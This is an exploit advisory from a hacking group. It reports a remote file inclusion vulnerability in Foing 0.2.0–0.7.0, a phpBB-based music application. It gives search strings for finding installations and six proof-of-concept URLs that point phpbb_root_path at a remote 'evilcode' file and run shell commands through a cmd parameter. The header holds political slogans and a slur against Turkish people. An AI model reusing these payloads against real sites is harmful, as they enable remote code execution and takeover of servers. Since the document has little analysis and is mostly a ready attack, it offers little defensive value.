# Kurdish Security Advisory =0D
# Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html=0D 
# Foing Remote File Include Vulnerability [PHPBB] :}=0D
# "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz ." Abdullah Ocalan=0D
# STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN !=0D
# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org=0D 
# Risk : High=0D
# Class : Remote=0D
# Script : Foing =0D
# Script Website : http://foing.sourceforge.net/=0D 
# Version : Foing 0.7.0=0D
                  0.6.0   =0D
                  0.5.0=0D
                  0.4.0=0D
                  0.3.0=0D
                  0.2.0=0D
# w0rkz : "Powered by foing 0.7.0 =A9 2003, 2004 Foing Group"=0D
          "Powered by foing 0.6.0 =A9 2003, 2004 Foing Group" etc..=0D
          =0D
=0D
=0D
# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers, Kurdistan Cyber Army etc..=0D
# Special Bitch  : Turkish LameRz :]=0D
=0D
--------------------------------------------------------------------------------=0D
=0D
# cmd shell example: =0D
# cmd shell variable: ($_GET[cmd]);=0D
=0D
Vulnerable code :=0D
=0D
Get along at directory config.php=0D
=0D
did you meet of .. =0D
=0D
=0D
=0D
Proof Of Concept :=0D
=0D
http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a=0D 
http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a=0D 
http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a=0D 
http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a=0D 
http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a=0D 
http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a